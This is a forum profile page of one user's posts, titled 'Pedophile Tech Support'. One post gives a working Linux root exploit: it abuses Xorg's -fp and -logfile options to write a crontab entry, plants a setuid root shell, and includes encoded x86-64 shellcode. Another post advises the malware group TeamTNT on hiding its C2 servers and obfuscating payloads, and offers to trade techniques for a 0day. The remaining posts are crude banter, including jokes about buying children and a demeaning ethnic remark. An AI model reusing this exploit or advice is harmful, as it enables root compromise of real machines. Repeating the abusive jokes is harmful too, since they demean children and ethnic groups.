User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 136
  6. 137
  7. 138
  8. 139
  9. 140
  10. 141
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    It's not called exploits for nothing (n_n")
  2. Sophie Pedophile Tech Support
    If you look closely at this part:


    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF


    You can tell that the operation above writes out everything between EOFto the /tmp directory, after which it's made execuyable with chmod +x. That means it can be run as a shell script.

    Here we are making sure that cronjob related to Xorg which has the permissions required will start the script in /tmp with the permissions we need.


    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg


    Once the script is executed with the new permissions we can do the operations defined there without issue.

    Even if something goes wrong i write this:



    global _start
    section .text

    _start:
    push 59
    pop rax
    cdq
    push rdx
    mov rbx, 0x6363672f6e69622f
    push rbx
    mov rbx, 0x7273752f2f2f2f2f
    push rbx
    push rsp
    pop rdi
    push rdx
    mov rbx, 0xffffffff9cd19b9a
    not rbx
    push rbx
    mov rbx, 0x91888fd08f928bd0
    not rbx
    push rbx
    push rsp
    pop r8
    push rdx
    mov rbx, 0xffffffffffff90d2
    not rbx
    push rbx
    push rsp
    pop r9
    push rdx
    mov rbx, 0xffffffff9b9a9188
    not rbx
    push rbx
    mov rbx, 0x8fd091969dd0939e
    not rbx
    push rbx
    mov rbx, 0x9c9093d08d8c8ad0
    not rbx
    push rbx
    push rsp
    pop r10
    push rdx
    push rsp
    pop rdx
    push r10
    push r9
    push r8
    push rdi
    push rsp
    pop rsi
    syscall


    What that does is invoke gcc with execve with UID 0, so the shell we wrote out with


    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c


    gets compiled the way we want to regardless of system permissions.
  3. Sophie Pedophile Tech Support
    Originally posted by troon In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?

    Sometimes this happens.


    cp /bin/sh /usr/local/bin/pwned
    cp: cannot create regular file '/usr/local/bin/pwned': Permission denied
  4. Sophie Pedophile Tech Support
    Also TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.

    I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.

    All of this is for legitimate research purposes of course.

    edit: Oops * shell script not shell code lol
  5. Sophie Pedophile Tech Support
    Originally posted by troon In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?

    Redundancy.
  6. Sophie Pedophile Tech Support
    I'm an inspiration to Threat Actors all around the world.

    https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

    Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regards to Linux, no compatibility issues. It's great.
  7. Sophie Pedophile Tech Support
    Well Totse Quick Mix 9000 i try to do my part, with threads about splosives and writing about some of the cyber shenanigans i get up to in T&T.

    But those are just genuine interests. You could even say passions especially as far as the computer science stuff is concerned.
  8. Sophie Pedophile Tech Support
    Originally posted by ⠀⠀⠀⠀⠀⠀ Uyghurs are people, too.

    All the ethnicities in Chiner that aren't Han Chinese are. Tibet is also being oppressed and the people's of inner mongolia as well.
  9. Sophie Pedophile Tech Support
    The only shoes i own that need shining are leather Hugo Boss shoes and my dress shoes that i wear if i have to wear a suit and tie. Them's the typa shoes you don't just shine with spit. You use special polish.
  10. Sophie Pedophile Tech Support
    Dying in a blaze of glory huh? Make sure it's an infernal fire storm.
  11. Sophie Pedophile Tech Support
    You're just some loser. Thinking you are God or the Devil for that matter is a level of narcissism hard to comprehend. Sure you can have a high opinion of yourself, but you have never in your life done a single thing that would even warrant being proud of. Let alone thinking you are God.

    Your only accomplishment in life is not having died from complications die to alcoholism.
  12. Sophie Pedophile Tech Support
    Piss boner? Is that an old man prostate thing? It's obviously different to morning wood. Anyway, surface level would suggest you have some inner turmoil considering your views on your own masculinity.
  13. Sophie Pedophile Tech Support
    You're really overcompensating for your noncery.
  14. Sophie Pedophile Tech Support
    Didn't know they sold kids at Walmart. How convenient.
  15. Sophie Pedophile Tech Support
    Do you have experience with this Vinnie?
  16. Sophie Pedophile Tech Support
    Originally posted by vindicktive vinny "yws sir, boy or girl"

    One girl please.
  17. Sophie Pedophile Tech Support
    Originally posted by the man who put it in my hood you were and still are because thats your life, the cucked era

    He's just jelly you're with lucy, Scron.
  18. Sophie Pedophile Tech Support
    Originally posted by Grylls ^ Theres the “tiers” of cum I predicted

    I’m starting to make you own yourself

    Damn this god mode shit feels so good, fuck you Sophie for doubting me

    Honestly i was just trying to keep you sane m8. God knows i require outside info/advice to keep myself sane sometimes.
  19. Sophie Pedophile Tech Support
    Hey Grylls, what typa foreign are you? you look like an AY-rab to me.
  20. Sophie Pedophile Tech Support
    Originally posted by Donald Trump And you always lose the one you use the most.

    That's why we KNOLL, boys!
  1. 1
  2. 2
  3. 3
  4. ...
  5. 136
  6. 137
  7. 138
  8. 139
  9. 140
  10. 141
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top